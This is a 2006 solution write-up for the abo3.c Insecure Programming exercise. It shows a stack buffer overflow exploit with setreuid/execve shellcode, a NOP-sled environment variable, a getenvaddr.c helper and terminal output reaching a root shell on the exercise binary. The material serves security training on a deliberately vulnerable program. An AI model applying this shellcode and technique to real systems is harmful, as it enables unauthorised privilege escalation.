/
| [exp-abo3.txt] Thu Mar 23 14:43:00 CET 2006
|
| abo3.c exploit - solution 1
| http://community.core-sdi.com/~gera/InsecureProgramming/abo3.c
|
| Copyright: bunker - http://rawlab.altervista.org
| 37F1 A7A1 BB94 89DB A920  3105 9F74 7349 AF4C BFA2
\

NB: "Procedure Linkage Table" exploit (*) doesn't work 
    on my system because "sh" used by system() drops 
    privileges, so i've used classic method here (**)
    overwriting return address.


(*) [Procedure Linkage Table exploit]
bunker@syn:~/abo3$ readelf -a abo3 | grep system
 080496a4  00000107 R_386_JUMP_SLOT   08048318   system
      1: 08048318   125 FUNC    GLOBAL DEFAULT  UND system@GLIBC_2.0 (2)
    104: 08048318   125 FUNC    GLOBAL DEFAULT  UND system@@GLIBC_2.0

bunker@syn:~/abo3$ ./abo3 `perl -e 'print "\x18\x83\x04\x08"x68;'` "id"
 uid=1000(bunker) gid=100(users) groups=17(audio),18(video),19(cdrom),100(users)           


(**) [Overwriting return address exploit]
/
| Suid abo3 (testing) 
\
bunker@syn:~/abo3$ su
Password:
 root@syn:/home/bunker/abo3# chown root.root abo3
 root@syn:/home/bunker/abo3# chmod +s abo3
 root@syn:/home/bunker/abo3# exit
  exit

/
| Put bytecode in file "bcode"
\
bunker@syn:~/abo3$ perl -e 'print "\x6a\x46\x58\x31\xdb\x31\xc9\xcd\x80
\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52
\x53\x89\xe1\xcd\x80"' > bcode

/
| Export BCODE env with NOPx100 + bcode
\
bunker@syn:~/abo3$ export BCODE=`perl -e 'print "\x90"x100'``cat bcode`

/
| Find $BCODE address (*see eof for getenvaddr.c)
\
bunker@syn:~/abo1$ ./getenvaddr BCODE
 BCODE is located at 0xbfffff1d

/
| Executes abo3, fill buffer with $BCODE address
\
bunker@syn:~/abo3$ ./abo3 `perl -e 'print "\x1d\xff\xff\xbf"x68'`
 sh-3.1# id
 uid=0(root) gid=100(users) groups=17(audio),18(video),19(cdrom),100(users)

/
| Boom! :D
\



------------------- getenvaddr.c -------------------
#include <stdlib.h>

int main(int argc, char *argv[]) {
    char *addr;
    if(argc < 2) {
        printf("usage: %s <env var name>\n", argv[0]);
        exit(0);
    }
    addr = getenv(argv[1]);
    if(addr == NULL) {
        printf("no env var\n");
        exit(0);
    }
    else
        printf("%s is located at %p\n",argv[1],addr);
    return 0;
}
------------------- getenvaddr.c -------------------